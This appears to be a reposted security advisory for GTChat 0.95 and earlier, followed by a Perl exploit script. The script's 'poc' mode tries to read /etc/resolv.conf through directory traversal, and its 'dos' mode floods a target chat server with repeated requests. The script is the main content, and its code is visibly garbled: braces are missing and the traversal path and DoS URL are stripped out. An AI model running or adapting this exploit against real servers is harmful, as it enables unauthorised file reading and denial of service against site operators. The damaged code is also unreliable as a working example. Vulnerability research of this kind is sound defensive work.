GTChat Remote Denial Of Service And Directory TraversalSummary
GT-chat is a fast and comfortable webchat application. Due to use of server push technology and working without a database like mySQL it uses only little server resources, which of course won't affect the performance.
A Directory traversal vulnerability exists in GTChat. GTChat is also vulnerable to denial of service by sending many chat requests sent to the server.
The information has been provided by x97Rang.
Vulnerable Systems:
* GTChat versions 0.95 and prior.
use LWP::Simple;
if (@ARGV < 3)
print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";
print "sever - URL chat\n";
print "path - path to\n";
print "mode - poc or dos,\n";
print " poc - simple check without DoS and exit,\n";
print " dos - DoS, you must set count for requests in 4 argument.\n\n";
exit ();
$DoS = "dos";
$POC = "poc";
$server = $ARGV[0];
$path = $ARGV[1];
$mode = $ARGV[2];
$count = $ARGV[3];
print qq(
# GTChat <= 0.95 Alpha remote DoS #
# tested on GTChat 0.95 Alpha #
# (c)oded by x97Rang 2005 RST/GHC #
# Respect: b1f, 1dt.w0lf, ed #
################################### );
if ($mode eq $POC)
print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";
$URL = sprintf("http://%s%s/ HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
$content = get "$URL";
if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/)
{ print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }
if ($content =~ /Fatal error/)
print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";
print "=== OUTPUT ===============================================================================\n";
print "\n$content\n";
print "=============================================================================== OUTPUT ===\n";
else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; }
if ($mode eq $DoS)
if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }
print "\nSend $count DoS requests to $server...\n";
$URL = sprintf(" HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);
for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }
print "Done, packets sended.\n";